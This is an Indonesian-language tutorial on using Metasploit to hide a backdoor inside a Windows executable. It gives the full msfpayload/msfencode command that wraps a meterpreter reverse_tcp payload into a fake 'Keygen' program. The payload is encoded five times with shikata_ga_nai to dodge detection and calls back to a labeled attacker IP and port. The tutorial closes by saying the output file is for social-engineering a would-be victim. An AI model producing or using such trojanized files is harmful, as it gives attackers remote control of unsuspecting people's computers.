Metasploit

Apa itu backdoor, dan apa itu fungsi nya ?
mungkin bagi sebagian ada yang sudah tahu, dan bagi yang belum mengetahui bisa membaca PEDIA Disini tentang Apa Itu Backdoor.

OK, pada sebelumnya kita sudah pernah membahas, bagaimana menyisipkan Backdoor / Malware kedalam file PDF, maka pada kali ini kita mencoba menyisipkan backdoor pada executable file.

Requirement
1. Metasploit
2. Windows / Linux OS

Step By Step

1.Menyiapkan Executable untuk target misal : Keygen.exe
2.Menyiapkan Payload Metasploit untuk menginject Executable tersebut dan
kemudian melakukan encryption menggunakan shikata_ga_nai
3.ketikan payload untuk eksekusi langkah 1 dan 2 diatas
“root@valencia:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/Keygen.exe -o /root/Desktop/Keygen2.exe”

jika mulus, maka proses encryption nya seperti ini :
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

keterangan :
- LHOST= 192.168.8.92 <== IP Attacker
- LPORT= 443 <== Port Listening

Yup, file yg dihasilkan adalah Keygen2.Exe dan itu adalah file yg akan digunakan untuk melakukan social enginering kepada calon korban.